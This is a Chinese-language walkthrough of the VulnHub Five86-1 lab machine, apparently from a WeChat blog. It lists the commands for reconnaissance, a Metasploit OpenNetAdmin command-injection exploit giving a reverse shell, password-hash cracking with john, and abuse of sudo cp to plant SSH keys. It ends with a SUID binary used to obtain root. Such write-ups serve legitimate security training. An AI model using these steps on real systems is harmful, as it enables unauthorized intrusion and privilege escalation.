今天实践的是vulnhub的Five86-1镜像,
下载地址,https://download.vulnhub.com/five86/Five86-1.zip,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.117,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.117,
获取到80端口有web服务,且有/ona目录,
浏览器访问http://192.168.0.117/ona,
获取到openNetAdmin的版本v18.1.1,
在msf里搜索可利用的漏洞,msfconsole,search openNetAdmin,
use exploit/unix/webapp/opennetadmin_ping_cmd_injection,
查看使用方法,show options,
配置远程主机和本地主机地址即可,
set RHOSTS 192.168.0.117
set LHOST 192.168.0.192
exploit
获取到msf shell,getuid确认不是root,
转成普通shell,shell,
python -c 'import pty;pty.spawn("/bin/bash")',
进入web路径,查看到用户名密码,密码是hash的,
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1,
并获取到密码的算法提示,
制作密码字典,crunch 10 10 aefhrt > dict.txt,
把密码hash保存到文件,vim hash,
破解密码,john --wordlist=/home/kali/dict.txt hash,
获取到用户名密码,douglas/fatherrrrr,
切换账号,su douglas,id确认不是root,
sudo -l查看可以用jen权限执行/bin/cp,
把douglas的公钥拷贝到jen下,
cat id_rsa.pub > /tmp/authorized_keys,cd /tmp,
chmod 777 authorized_keys,
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh,
使用douglas的私钥做ssh登录,
cp /home/douglas/.ssh/id_rsa ./,chmod 600 id_rsa,
ssh -i id_rsa [email protected],提示了mail信息,id确认不是root,
进入mail目录进行查看,cd /var/mail,cat jen,
获取到用户名密码,moss/Fire!Fire!,
切换账号,su moss,id确认不是root,
查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,
获取到/home/moss/.games/upyourgame,
执行upyourgame,一路回答问题,获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Five86-1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论